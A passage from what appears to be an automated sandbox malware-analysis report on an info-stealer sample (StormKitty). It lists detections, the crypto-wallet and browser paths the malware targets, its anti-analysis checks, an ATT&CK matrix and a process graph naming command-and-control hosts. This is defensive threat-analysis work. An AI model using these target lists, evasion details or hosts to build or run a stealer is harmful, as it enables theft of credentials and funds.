                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected BrowserPasswordDump
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Yara detected StormKitty Stealer
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: exodus
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                  Source: TradeHub.comBinary or memory string: WIN_81
                  Source: TradeHub.comBinary or memory string: WIN_XP
                  Source: TradeHub.com, 0000001D.00000000.1470085264.0000000000423000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: TradeHub.comBinary or memory string: WIN_XPe
                  Source: TradeHub.comBinary or memory string: WIN_VISTA
                  Source: TradeHub.comBinary or memory string: WIN_7
                  Source: TradeHub.comBinary or memory string: WIN_8
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected BrowserPasswordDump
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Yara detected StormKitty Stealer
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003E2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,27_2_003E2263
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003E1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,27_2_003E1C61

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		231
                  Windows Management Instrumentation                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		2
                  Valid Accounts                  		1
                  Extra Window Memory Injection                  		12
                  Obfuscated Files or Information                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin Shares21
                  Input Capture                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Scheduled Task/Job                  		2
                  Scheduled Task/Job                  		2
                  Valid Accounts                  		1
                  Software Packing                  		NTDS49
                  System Information Discovery                  		Distributed Component Object Model3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell                  		2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		LSA Secrets1
                  Query Registry                  		SSHKeylogging4
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
                  Process Injection                  		1
                  Extra Window Memory Injection                  		Cached Domain Credentials361
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                  Scheduled Task/Job                  		111
                  Masquerading                  		DCSync161
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		Proc Filesystem5
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow11
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                  Access Token Manipulation                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631942 Sample: ADFoyxP.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 114 ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR 2->114 116 elevated-outcomes.shop 2->116 118 edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 2->118 140 Suricata IDS alerts for network traffic 2->140 142 Found malware configuration 2->142 144 Malicious sample detected (through community Yara rule) 2->144 146 16 other signatures 2->146 14 ADFoyxP.exe 53 2->14         started        18 msedge.exe 2->18         started        21 wscript.exe 1 2->21         started        23 wscript.exe 2->23         started        signatures3 process4 dnsIp5 106 C:\Users\user\AppData\Local\...\Worcester.pub, data 14->106 dropped 108 C:\Users\user\AppData\Local\...\Vampire.pub, data 14->108 dropped 110 C:\Users\user\AppData\Local\...\Vacation.pub, data 14->110 dropped 112 34 other malicious files 14->112 dropped 182 Writes many files with high entropy 14->182 25 cmd.exe 2 14->25         started        120 239.255.255.250 unknown Reserved 18->120 184 Maps a DLL or memory area into another process 18->184 29 msedge.exe 18->29         started        32 msedge.exe 18->32         started        34 msedge.exe 18->34         started        40 2 other processes 18->40 186 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->186 36 TradeHub.com 21->36         started        38 TradeHub.com 23->38         started        file6 signatures7 process8 dnsIp9 94 C:\Users\user\AppData\Local\Temp\...\Seat.com, PE32 25->94 dropped 156 Suspicious powershell command line found 25->156 158 Bypasses PowerShell execution policy 25->158 160 Drops PE files with a suspicious file extension 25->160 162 2 other signatures 25->162 42 Seat.com 5 25->42         started        46 cmd.exe 2 25->46         started        48 cmd.exe 1 25->48         started        50 10 other processes 25->50 132 c-msn-pme.trafficmanager.net 13.74.129.1, 443, 62104 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 29->132 134 ax-0001.ax-msedge.net 150.171.28.10, 443, 62105 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 29->134 136 32 other IPs or domains 29->136 file10 signatures11 process12 file13 96 C:\Users\user\AppData\Local\...\TradeHub.com, PE32 42->96 dropped 98 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 42->98 dropped 100 C:\Users\user\AppData\Local\...\TradeHub.js, ASCII 42->100 dropped 102 C:\Users\user\AppData\Local\...\F, data 42->102 dropped 164 Drops PE files with a suspicious file extension 42->164 166 Writes to foreign memory regions 42->166 168 Writes many files with high entropy 42->168 170 Injects a PE file into a foreign processes 42->170 52 RegAsm.exe 42->52         started        57 cmd.exe 2 42->57         started        59 cmd.exe 1 42->59         started        104 C:\Users\user\AppData\Local\Temp\353090\m, data 46->104 dropped signatures14 process15 dnsIp16 128 45.95.18.173, 4449, 49690, 62054 SHOCK-1US Netherlands 52->128 88 C:\Users\user\AppData\Local\...\curcuma.exe, PE32+ 52->88 dropped 90 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 52->90 dropped 148 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 52->148 150 Found many strings related to Crypto-Wallets (likely being stolen) 52->150 152 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 52->152 154 2 other signatures 52->154 61 cmd.exe 52->61         started        92 C:\Users\user\AppData\...\TradeHub.url, MS 57->92 dropped 64 conhost.exe 57->64         started        66 conhost.exe 59->66         started        68 schtasks.exe 1 59->68         started        file17 signatures18 process19 signatures20 180 Suspicious powershell command line found 61->180 70 powershell.exe 61->70         started        72 conhost.exe 61->72         started        process21 process22 74 curcuma.exe 70->74         started        dnsIp23 130 elevated-outcomes.shop 104.21.32.1, 443, 62055, 62056 CLOUDFLARENETUS United States 74->130 172 Tries to harvest and steal browser information (history, passwords, etc) 74->172 174 Allocates memory in foreign processes 74->174 176 Tries to harvest and steal Bitcoin Wallet information 74->176 178 Creates a thread in another existing process (thread injection) 74->178 78 chrome.exe 74->78         started        81 msedge.exe 74->81         started        signatures24 process25 dnsIp26 138 192.168.2.6, 138, 443, 4449 unknown unknown 78->138 83 chrome.exe 78->83         started        86 msedge.exe 81->86         started        process27 dnsIp28 122 www.google.com 142.250.185.68, 443, 62062, 62066 GOOGLEUS United States 83->122 124 plus.l.google.com 142.250.186.78, 443, 62090 GOOGLEUS United States 83->124 126 2 other IPs or domains 83->126

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.